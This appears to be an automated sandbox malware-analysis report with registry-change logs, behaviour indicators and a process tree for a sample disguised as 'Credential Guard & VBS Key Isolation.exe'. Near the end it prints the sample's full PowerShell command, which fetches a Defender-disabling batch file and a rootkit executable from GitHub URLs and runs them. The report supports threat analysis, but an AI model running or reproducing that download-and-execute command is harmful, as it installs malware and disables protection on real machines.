4173736574735c34663632356538663034616539306561373164373834366166636630616363643165336465303163386235353632633861613838636462646361643830626230000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007575686a6b6d716b00000000000000005092fec3dec97642a11a0e5697cb33258671d4b844edef11a3c8fafe8a32395a5092fec3dec97642a11a0e5697cb33258671d4b844edef11a3c8fafe8a32395ad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100360031003300330030003700380033002d0032003900310032003500320035003600350031002d0031003200370038003500300038003800330034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f001e24000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06f98674-c7ef-4803 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e4a769c7-0984-4629 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\900daa0d-46aa-4fe9 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\251670ff-6593-42a0 RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03423d1b-2958-46dd = "\\\\?\\Volume{241E003F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4f625e8f04ae90ea71d7846afcf0accd1e3de01c8b5562c8aa88cdbdcad80bb0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f967ccb-2281-4a2e RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f967ccb-2281-4a2e = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f101c8f8-7032-4e33 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f101c8f8-7032-4e33 = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b863a62a-5577-45ae RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f967ccb-2281-4a2e RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06f98674-c7ef-4803 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06f98674-c7ef-4803 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b863a62a-5577-45ae = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a7dba26d7c90db0164b8166e7c90db0164b8166e7c90db01c97911000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000685a42b62000643331323065343963313839363763363564313566376337663763393931396565376536613138646663323561376663343635303334363536623461636166620000b20009000400efbe685a42b6685a42b62e000000000000000000000000000000000000000000000000004e3aeb00640033003100320030006500340039006300310038003900360037006300360035006400310035006600370063003700660037006300390039003100390065006500370065003600610031003800640066006300320035006100370066006300340036003500300033003400360035003600620034006100630061006600620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002657ae171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64333132306534396331383936376336356431356637633766376339393139656537653661313864666332356137666334363530333436353662346163616662000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007575686a6b6d716b00000000000000005092fec3dec97642a11a0e5697cb33258d71d4b844edef11a3c8fafe8a32395a5092fec3dec97642a11a0e5697cb33258d71d4b844edef11a3c8fafe8a32395ad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100360031003300330030003700380033002d0032003900310032003500320035003600350031002d0031003200370038003500300038003800330034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f001e24000000000000d01200000000000000000000000000000000 RuntimeBroker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1832 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5812 powershell.exe 5812 powershell.exe 5244 MasonRootkit.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 764 taskmgr.exe 764 taskmgr.exe 1992 dllhost.exe 1992 dllhost.exe 2748 Credential Guard & VBS Key Isolation.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 2748 Credential Guard & VBS Key Isolation.exe 1992 dllhost.exe 1992 dllhost.exe 2748 Credential Guard & VBS Key Isolation.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 764 taskmgr.exe 764 taskmgr.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 764 taskmgr.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe 1992 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3508 Explorer.EXE 764 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2748 Credential Guard & VBS Key Isolation.exe Token: SeDebugPrivilege 5812 powershell.exe Token: SeDebugPrivilege 5244 MasonRootkit.exe Token: SeDebugPrivilege 5244 MasonRootkit.exe Token: SeDebugPrivilege 1992 dllhost.exe Token: SeDebugPrivilege 764 taskmgr.exe Token: SeSystemProfilePrivilege 764 taskmgr.exe Token: SeCreateGlobalPrivilege 764 taskmgr.exe Token: SeAssignPrimaryTokenPrivilege 2072 svchost.exe Token: SeIncreaseQuotaPrivilege 2072 svchost.exe Token: SeSecurityPrivilege 2072 svchost.exe Token: SeTakeOwnershipPrivilege 2072 svchost.exe Token: SeLoadDriverPrivilege 2072 svchost.exe Token: SeSystemtimePrivilege 2072 svchost.exe Token: SeBackupPrivilege 2072 svchost.exe Token: SeRestorePrivilege 2072 svchost.exe Token: SeShutdownPrivilege 2072 svchost.exe Token: SeSystemEnvironmentPrivilege 2072 svchost.exe Token: SeUndockPrivilege 2072 svchost.exe Token: SeManageVolumePrivilege 2072 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2072 svchost.exe Token: SeIncreaseQuotaPrivilege 2072 svchost.exe Token: SeSecurityPrivilege 2072 svchost.exe Token: SeTakeOwnershipPrivilege 2072 svchost.exe Token: SeLoadDriverPrivilege 2072 svchost.exe Token: SeSystemtimePrivilege 2072 svchost.exe Token: SeBackupPrivilege 2072 svchost.exe Token: SeRestorePrivilege 2072 svchost.exe Token: SeShutdownPrivilege 2072 svchost.exe Token: SeSystemEnvironmentPrivilege 2072 svchost.exe Token: SeUndockPrivilege 2072 svchost.exe Token: SeManageVolumePrivilege 2072 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2072 svchost.exe Token: SeIncreaseQuotaPrivilege 2072 svchost.exe Token: SeSecurityPrivilege 2072 svchost.exe Token: SeTakeOwnershipPrivilege 2072 svchost.exe Token: SeLoadDriverPrivilege 2072 svchost.exe Token: SeSystemtimePrivilege 2072 svchost.exe Token: SeBackupPrivilege 2072 svchost.exe Token: SeRestorePrivilege 2072 svchost.exe Token: SeShutdownPrivilege 2072 svchost.exe Token: SeSystemEnvironmentPrivilege 2072 svchost.exe Token: SeUndockPrivilege 2072 svchost.exe Token: SeManageVolumePrivilege 2072 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2072 svchost.exe Token: SeIncreaseQuotaPrivilege 2072 svchost.exe Token: SeSecurityPrivilege 2072 svchost.exe Token: SeTakeOwnershipPrivilege 2072 svchost.exe Token: SeLoadDriverPrivilege 2072 svchost.exe Token: SeSystemtimePrivilege 2072 svchost.exe Token: SeBackupPrivilege 2072 svchost.exe Token: SeRestorePrivilege 2072 svchost.exe Token: SeShutdownPrivilege 2072 svchost.exe Token: SeSystemEnvironmentPrivilege 2072 svchost.exe Token: SeUndockPrivilege 2072 svchost.exe Token: SeManageVolumePrivilege 2072 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2072 svchost.exe Token: SeIncreaseQuotaPrivilege 2072 svchost.exe Token: SeSecurityPrivilege 2072 svchost.exe Token: SeTakeOwnershipPrivilege 2072 svchost.exe Token: SeLoadDriverPrivilege 2072 svchost.exe Token: SeSystemtimePrivilege 2072 svchost.exe Token: SeBackupPrivilege 2072 svchost.exe Token: SeRestorePrivilege 2072 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 2748 Credential Guard & VBS Key Isolation.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe 764 taskmgr.exe -
Suspicious use of UnmapMainImage 4 IoCs
pid Process 4052 RuntimeBroker.exe 4212 RuntimeBroker.exe 3508 Explorer.EXE 1216 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2748 wrote to memory of 5812 2748 Credential Guard & VBS Key Isolation.exe 87 PID 2748 wrote to memory of 5812 2748 Credential Guard & VBS Key Isolation.exe 87 PID 5812 wrote to memory of 2644 5812 powershell.exe 91 PID 5812 wrote to memory of 2644 5812 powershell.exe 91 PID 2748 wrote to memory of 1832 2748 Credential Guard & VBS Key Isolation.exe 93 PID 2748 wrote to memory of 1832 2748 Credential Guard & VBS Key Isolation.exe 93 PID 2644 wrote to memory of 5244 2644 MasonRootkit.exe 97 PID 2644 wrote to memory of 5244 2644 MasonRootkit.exe 97 PID 2644 wrote to memory of 2228 2644 MasonRootkit.exe 98 PID 2644 wrote to memory of 2228 2644 MasonRootkit.exe 98 PID 2228 wrote to memory of 5672 2228 cmd.exe 100 PID 2228 wrote to memory of 5672 2228 cmd.exe 100 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 5244 wrote to memory of 1992 5244 MasonRootkit.exe 101 PID 1992 wrote to memory of 644 1992 dllhost.exe 5 PID 1992 wrote to memory of 700 1992 dllhost.exe 7 PID 1992 wrote to memory of 984 1992 dllhost.exe 12 PID 1992 wrote to memory of 480 1992 dllhost.exe 13 PID 1992 wrote to memory of 712 1992 dllhost.exe 14 PID 1992 wrote to memory of 1040 1992 dllhost.exe 15 PID 1992 wrote to memory of 1088 1992 dllhost.exe 17 PID 1992 wrote to memory of 1116 1992 dllhost.exe 18 PID 1992 wrote to memory of 1232 1992 dllhost.exe 19 PID 1992 wrote to memory of 1240 1992 dllhost.exe 20 PID 1992 wrote to memory of 1288 1992 dllhost.exe 21 PID 700 wrote to memory of 2876 700 lsass.exe 50 PID 1992 wrote to memory of 1348 1992 dllhost.exe 22 PID 1992 wrote to memory of 1376 1992 dllhost.exe 23 PID 1992 wrote to memory of 1452 1992 dllhost.exe 24 PID 1992 wrote to memory of 1468 1992 dllhost.exe 25 PID 1992 wrote to memory of 1488 1992 dllhost.exe 26 PID 1992 wrote to memory of 1496 1992 dllhost.exe 27 PID 1992 wrote to memory of 1648 1992 dllhost.exe 28 PID 1992 wrote to memory of 1716 1992 dllhost.exe 29 PID 1992 wrote to memory of 1732 1992 dllhost.exe 30 PID 1992 wrote to memory of 1812 1992 dllhost.exe 31 PID 1992 wrote to memory of 1868 1992 dllhost.exe 32 PID 1992 wrote to memory of 2000 1992 dllhost.exe 33 PID 1992 wrote to memory of 1164 1992 dllhost.exe 34 PID 1992 wrote to memory of 1388 1992 dllhost.exe 35 PID 1992 wrote to memory of 2060 1992 dllhost.exe 36 PID 1992 wrote to memory of 2072 1992 dllhost.exe 37 PID 700 wrote to memory of 2876 700 lsass.exe 50 PID 1992 wrote to memory of 2220 1992 dllhost.exe 38 PID 1992 wrote to memory of 2272 1992 dllhost.exe 40 PID 1992 wrote to memory of 2372 1992 dllhost.exe 41 PID 700 wrote to memory of 3548 700 lsass.exe 95 PID 700 wrote to memory of 2272 700 lsass.exe 40 PID 1992 wrote to memory of 2548 1992 dllhost.exe 42 PID 1992 wrote to memory of 2556 1992 dllhost.exe 43 PID 1992 wrote to memory of 2676 1992 dllhost.exe 44 PID 1992 wrote to memory of 2700 1992 dllhost.exe 45 PID 1992 wrote to memory of 2788 1992 dllhost.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:644
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:480
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{42445076-95b2-40cd-9177-f893046be572}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1240 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2812
-
-
C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"2⤵
- Executes dropped EXE
PID:5168
-
-
C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"2⤵
- Executes dropped EXE
PID:4572
-
-
C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"2⤵
- Executes dropped EXE
PID:3660
-
-
C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"2⤵
- Executes dropped EXE
PID:4360
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1488
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2676
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1868 -
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x404 0x5142⤵PID:3648
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1388
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2272
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2860
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2876
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2900
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3436
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:3508 -
C:\Users\Admin\AppData\Local\Temp\Credential Guard & VBS Key Isolation.exe"C:\Users\Admin\AppData\Local\Temp\Credential Guard & VBS Key Isolation.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
